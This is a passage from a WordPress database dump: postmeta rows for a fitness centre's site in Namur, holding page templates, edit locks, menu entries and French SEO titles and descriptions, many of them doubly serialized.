(971, 275, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(972, 275, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966296:1\";}\";'),
(973, 315, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(974, 315, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(975, 315, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966357:1\";}\";'),
(976, 316, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(977, 316, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(978, 316, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966399:1\";}\";'),
(980, 317, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966645:1\";}\";'),
(981, 317, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(982, 318, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(983, 318, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966701:1\";}\";'),
(984, 318, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(985, 319, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(986, 319, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966723:1\";}\";'),
(987, 319, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(988, 320, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(989, 320, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373470968:1\";}\";'),
(990, 320, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1488, 131, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1487, 131, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(994, 321, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(995, 321, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471048:1\";}\";'),
(996, 321, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(997, 322, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(998, 322, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471054:1\";}\";'),
(999, 322, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1000, 323, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1001, 323, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471102:1\";}\";'),
(1002, 323, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1003, 324, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1004, 324, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471160:1\";}\";'),
(1005, 324, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1006, 325, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1007, 325, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471233:1\";}\";'),
(1008, 325, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1009, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1010, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373471270:1\";}\";'),
(1011, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1012, 326, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1013, 326, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373472630:1\";}\";'),
(1014, 326, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1015, 32, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1016, 32, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373472646:1\";}\";'),
(1017, 32, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1486, 131, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383771536:1\";}\";'),
(1484, 388, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1485, 131, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1483, 388, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1042, 332, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1043, 332, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770086:1\";}\";'),
(1044, 332, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1045, 332, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1046, 332, '_su_description', 's:166:\"a:1:{i:0;s:147:\"Unique à Namur, une nouvelle façon de faire du fitness - notre approche unique fait intervenir le coaching nutritionnel et la gestion  du stress.\";}\";'),
(1047, 332, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1048, 333, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1049, 333, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770152:1\";}\";'),
(1050, 333, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1051, 333, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1052, 333, '_su_description', 's:166:\"a:1:{i:0;s:147:\"Unique à Namur, une nouvelle façon de faire du fitness - notre approche unique fait intervenir le coaching nutritionnel et la gestion  du stress.\";}\";'),
(1053, 333, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1055, 334, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770287:1\";}\";'),
(1056, 334, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1057, 334, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1058, 334, '_su_description', 's:246:\"a:1:{i:0;s:227:\"Unique à Namur, une nouvelle façon de faire du fitness. Venez découvrir notre salle de cross training où vous bénéficierez d’un encadrement professionnel et d’entrainements personnalisés pour atteindre vos objectifs.\";}\";'),
(1059, 334, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1061, 335, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770472:1\";}\";'),
(1062, 335, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1063, 5, '_su_title', 'Cross Training Center - Notre philosophie'),
(1064, 5, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Nous vous proposons une approche globale faisant intervenir l\'alimentation, l\'activité physique, et la gestion du stress'),
(1065, 5, '_su_rich_snippet_type', 'none'),
(1066, 336, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1067, 336, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770624:1\";}\";'),
(1068, 336, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1069, 20, '_su_title', 'Cross Training Center - L\'équipe'),
(1070, 20, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.'),
(1071, 20, '_su_rich_snippet_type', 'none'),
(1072, 337, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1073, 337, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770677:1\";}\";'),
(1074, 337, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1075, 9, '_su_title', 'Cross Training Center - Contact'),
(1076, 9, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur'),
(1077, 9, '_su_rich_snippet_type', 'none'),
(1078, 339, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1079, 339, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1377247543:1\";}\";'),
(1080, 339, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1081, 339, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1082, 339, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1083, 339, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1335, 358, '_su_description', 's:198:\"a:1:{i:0;s:179:\"Unique à Namur, une nouvelle façon de faire du fitness. Nous vous proposons une approche globale faisant intervenir l\'alimentation, l\'activité physique, et la gestion du stress\";}\";'),
(1332, 358, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585523:1\";}\";'),
(1333, 358, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1334, 358, '_su_title', 's:59:\"a:1:{i:0;s:41:\"Cross Training Center - Notre philosophie\";}\";'),
(1331, 358, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1482, 388, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383588274:1\";}\";'),
(1481, 388, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1480, 387, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1479, 387, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1559, 395, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1477, 387, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1478, 387, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383588244:1\";}\";'),
(1475, 385, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1474, 385, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1473, 385, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1471, 385, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587326:1\";}\";'),
(1472, 385, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1470, 385, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1469, 384, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1468, 384, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1467, 384, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587231:1\";}\";'),
(1465, 383, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1466, 384, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1464, 383, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1463, 383, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587176:1\";}\";'),
(1462, 383, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1461, 382, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1460, 382, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1459, 382, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1458, 382, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1457, 382, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587103:1\";}\";'),
(1456, 382, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1455, 142, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1454, 142, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1453, 142, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1452, 142, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1451, 142, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383587021:1\";}\";'),
(1449, 381, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1450, 142, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1448, 381, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1447, 381, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586926:1\";}\";'),
(1446, 381, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1445, 380, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1444, 380, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1442, 380, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1443, 380, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586895:1\";}\";'),
(1441, 379, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1440, 379, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1439, 379, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586865:1\";}\";'),
(1438, 379, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1437, 378, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1435, 378, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586776:1\";}\";'),
(1436, 378, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1434, 378, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1138, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1139, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449302:2\";}\";'),
(1140, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1141, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1142, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449424:2\";}\";'),
(1143, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1144, 214, '_su_rich_snippet_type', 'none'),
(1145, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1146, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449424:2\";}\";'),
(1147, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1148, 218, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1149, 342, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1150, 342, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449484:2\";}\";'),
(1151, 342, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1152, 342, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1153, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1154, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449498:2\";}\";'),
(1155, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1156, 218, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1433, 377, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966329:1\";}\";'),
(1432, 377, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1431, 377, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1430, 376, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1428, 376, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449550:2\";}\";'),
(1429, 376, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1427, 376, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1426, 375, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1425, 375, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1423, 375, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1424, 375, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1422, 375, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586685:1\";}\";'),
(1421, 375, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1420, 374, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1419, 374, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1418, 374, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1417, 374, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1416, 374, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586651:1\";}\";'),
(1415, 374, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1414, 373, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1413, 373, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1412, 373, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1411, 373, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1408, 372, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1409, 373, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1410, 373, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586613:1\";}\";'),
(1407, 372, '_su_description', 's:138:\"a:1:{i:0;s:119:\"Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur\";}\";'),
(1406, 372, '_su_title', 's:49:\"a:1:{i:0;s:31:\"Cross Training Center - Contact\";}\";'),
(1403, 372, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1404, 372, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383586052:1\";}\";'),
(1405, 372, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1401, 371, '_menu_item_url', ''),
(1400, 371, '_menu_item_xfn', ''),
(1399, 371, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(1398, 371, '_menu_item_target', ''),
(1397, 371, '_menu_item_object', 'page'),
(1394, 371, '_menu_item_type', 'post_type'),
(1395, 371, '_menu_item_menu_item_parent', '0'),
(1396, 371, '_menu_item_object_id', '369'),
(1393, 369, '_su_rich_snippet_type', 'none'),
(1392, 370, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1391, 370, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585939:1\";}\";'),
(1389, 369, '_wp_page_template', 'default'),
(1390, 370, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1386, 368, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1387, 369, '_edit_last', '1'),
(1388, 369, '_edit_lock', '1429688328:1'),
(1385, 368, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1384, 368, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1382, 368, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585897:1\";}\";'),
(1383, 368, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1381, 368, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1380, 367, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1379, 367, '_su_description', 's:177:\"a:1:{i:0;s:158:\"Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.\";}\";'),
(1377, 367, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1378, 367, '_su_title', 's:51:\"a:1:{i:0;s:33:\"Cross Training Center - L\'équipe\";}\";'),
(1376, 367, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585853:1\";}\";'),
(1217, 344, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1218, 344, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962232:1\";}\";'),
(1219, 344, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1220, 344, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1221, 344, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1222, 344, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1223, 345, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1224, 345, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962331:1\";}\";'),
(1225, 345, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1226, 345, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1227, 345, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1228, 345, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1375, 367, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1374, 366, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1373, 366, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1372, 366, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1235, 346, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1236, 346, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962409:1\";}\";'),
(1237, 346, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1238, 346, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1239, 346, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1240, 346, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1371, 366, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1370, 366, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585792:1\";}\";'),
(1369, 366, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1368, 365, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1367, 365, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1247, 347, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1248, 347, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962872:1\";}\";'),
(1249, 347, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1250, 347, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1251, 347, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1252, 347, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1366, 365, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1365, 365, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1364, 365, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585741:1\";}\";'),
(1362, 363, '_su_rich_snippet_type', 'none'),
(1363, 365, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1361, 364, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1259, 348, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1260, 348, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962951:1\";}\";'),
(1261, 348, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1262, 348, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1263, 348, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1264, 348, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1265, 349, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1266, 349, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963050:1\";}\";'),
(1267, 349, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1268, 349, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1269, 349, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1270, 349, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1271, 350, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1272, 350, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963070:1\";}\";'),
(1273, 350, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1274, 350, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1275, 350, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1276, 350, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1360, 364, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585667:1\";}\";'),
(1359, 364, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1357, 363, '_edit_lock', '1441213788:3'),
(1358, 363, '_wp_page_template', 'default'),
(1354, 362, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1355, 361, '_su_rich_snippet_type', 'none'),
(1356, 363, '_edit_last', '3'),
(1353, 362, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383585631:1\";}\";'),
(1283, 351, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1284, 351, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963161:1\";}\";'),
(1285, 351, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1286, 351, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
